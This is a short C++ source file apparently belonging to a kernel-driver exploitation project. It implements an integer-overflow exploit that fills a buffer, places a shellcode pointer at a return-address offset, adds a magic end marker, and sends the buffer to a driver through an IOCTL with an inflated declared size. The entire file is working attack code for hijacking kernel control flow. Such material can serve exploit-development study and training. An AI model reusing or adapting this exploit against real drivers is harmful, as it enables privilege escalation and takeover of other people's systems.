IntegerOverflow.cpp

#include "IntegerOverflow.h"

bool 
ExploitIntegerOverflow::exploit() {
	
	static const size_t Buffer_End_Magic_Marker = 0x0BAD0B0B0;
	static const size_t Actual_Buffer_Size = 0x0000FFFF;
	static const size_t Declared_Input_Buffer_Size = 0xFFFFFFFF;

	shared_ptr<UCHAR> buffer = shared_ptr<UCHAR>(new UCHAR[Actual_Buffer_Size]);
	
	if(!buffer) {
		wcerr << L"[!] Could not allocate buffer of size: 0x" 
			<< hex << setw(8) << setfill(L'0') << Actual_Buffer_Size << endl;
		return false;
	}
	
	memset(buffer.get(), 'A', Actual_Buffer_Size);

	static const size_t Return_Address_Overwrite_Index = 0x828;
	auto shellcodePtr = adjustPayloadEpilogue(8, true);

	*(reinterpret_cast<void **>(&buffer.get()[Return_Address_Overwrite_Index])) = *shellcodePtr;
	*(reinterpret_cast<size_t*>(&buffer.get()[Return_Address_Overwrite_Index + 4])) = \
		Buffer_End_Magic_Marker;
		
	bool ret = driver.SendIOCTL (
		ExploitIntegerOverflow::Ioctl_Code,
		buffer.get(),
		Declared_Input_Buffer_Size
	);
	
	return ret;
}